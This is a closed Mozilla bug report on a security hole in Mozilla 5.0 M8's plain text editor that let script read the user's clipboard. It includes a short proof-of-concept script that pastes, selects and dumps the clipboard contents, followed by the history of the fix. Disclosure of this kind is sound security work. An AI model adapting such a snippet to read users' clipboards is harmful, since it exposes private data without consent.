Closed Bug 12190 Opened 25 years ago Closed 25 years ago

Plain Text Editor allows reading clipboard

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows 95
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

(
URL
)

Details

There is a security vulnerability in Mozilla 5.0 M8 (later builds are also
affected)
which allows stealing user's clipboard.

In downloaded TextEditorAppShell2.xul is added:

<html:script>
function DumpClip()
{
 EditorPaste();
 EditorSelectAll();
 dump("-----Begin Clipboard\n");
 dump(editorShell.editorSelection.getRangeAt(0).toString());
 dump("\n-----End Clipboard\n");
}
setTimeout("DumpClip()",5000);
</html:script>

Demonstration is available at:
http://www.nat.bg/~joro/mozilla/editor/editor2.html
Status: NEW → ASSIGNED
Target Milestone: M11
Blocks: 12633
Depends on: 13024
Depends on: 13021
No longer depends on: 13024
Move security bugs from M11 to M13; needed for beta but not for dogfood.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
XPAppCoresManager finally died, closing this security hole.
Verified fixed.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.